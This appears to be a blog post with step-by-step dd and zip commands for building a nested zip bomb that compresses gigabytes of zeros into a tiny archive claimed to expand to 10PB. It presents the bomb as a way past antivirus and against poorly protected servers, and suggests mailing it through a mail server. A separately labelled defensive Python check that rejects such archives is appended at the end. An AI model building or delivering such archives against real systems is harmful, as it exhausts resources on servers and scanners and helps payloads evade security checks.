Zip bombs aren't new. Since the days of bulletin board systems people have been highly compressing implausibly large files and transferring them to target machines to consume resources.
Machines these days can handle much larger files and have ever larger amounts of RAM to process them, but zip bombs can still be very useful to an attacker in bypassing weak antivirus or filling up poorly protected servers. Some antivirus software will try to expand the zip file to scan it, using a lot of resources. Others don't try to expand huge files and simply let them through. Neither of these options really protects us.
There was a zip file going around a year or two ago called 42.zip which expands to about 4.5PB. It's good, but can we do better?
The most efficient thing to compress is a string of 00000000's. So let's start with a GB of nothing.
dd if=/dev/zero bs=1024 count=1048576
And let's squeeze that as much as possible:
dd if=/dev/zero bs=1024 count=1048576 | zip -9 -q zipbomb.zip -
Now let's make 10 of those zip files and zip them up into a new zip file.
cp zipbomb.zip 0.zip
cp zipbomb.zip 1.zip
cp zipbomb.zip 2.zip
cp zipbomb.zip 3.zip
cp zipbomb.zip 4.zip
cp zipbomb.zip 5.zip
cp zipbomb.zip 6.zip
cp zipbomb.zip 7.zip
cp zipbomb.zip 8.zip
cp zipbomb.zip 9.zip
rm zipbomb.zip
zip -9 -q zipbomb.zip *.zip
Now rinse and repeat that last step 7 times.
That should give you a 28k zip file that contains 10PB of useless data. Yup, that's right, half the size and twice the data. You can check it out here.
I've put my little shell script up on github if you want to take a look.
How do you use it? Well mail it through your mail server and see if it makes it...
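For the receiving side, here is an added example (not from the original post or its shell script): a Python pre-scan check that rejects an archive on declared size, expansion ratio and nesting depth, rather than fully expanding it or waving it through. The limits and the names `check_zip`, `make_zip` and `ArchiveRejected` are assumptions for illustration; nested archives are recognised by the zip local-file-header magic at the start of a member.

```python
import io
import zipfile

# Assumed limits for illustration; tune them for your gateway or upload handler.
MAX_TOTAL = 100 * 1024 * 1024  # expanded bytes allowed across all nesting levels
MAX_RATIO = 200                # per-member uncompressed/compressed ratio
MAX_DEPTH = 3                  # levels of zip-inside-zip
MAX_NESTED = 1024 * 1024       # largest nested archive we will load to inspect

class ArchiveRejected(Exception):
    pass

def check_zip(data, depth=0, budget=None):
    """Inspect a zip held in memory; return declared expanded bytes or raise."""
    budget = [MAX_TOTAL] if budget is None else budget  # shared across recursion
    if depth > MAX_DEPTH:
        raise ArchiveRejected("nested deeper than %d levels" % MAX_DEPTH)
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # Sizes come from the central directory, so nothing is inflated yet.
            if info.file_size > MAX_RATIO * max(info.compress_size, 1):
                raise ArchiveRejected("%s: expansion ratio too high" % info.filename)
            budget[0] -= info.file_size
            if budget[0] < 0:
                raise ArchiveRejected("expanded size exceeds budget")
            total += info.file_size
            with zf.open(info) as member:
                head = member.read(4)
                if head != b"PK\x03\x04":  # not a zip local-file header
                    continue
                inner = head + member.read(MAX_NESTED + 1)
            if len(inner) > MAX_NESTED:
                raise ArchiveRejected("%s: nested archive too large" % info.filename)
            total += check_zip(inner, depth + 1, budget)
    return total

def make_zip(members):
    """Build a small zip in memory from {name: bytes} (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()
```

The size budget is shared across every nesting level, so ten modest-looking inner archives count against the same total as one large one.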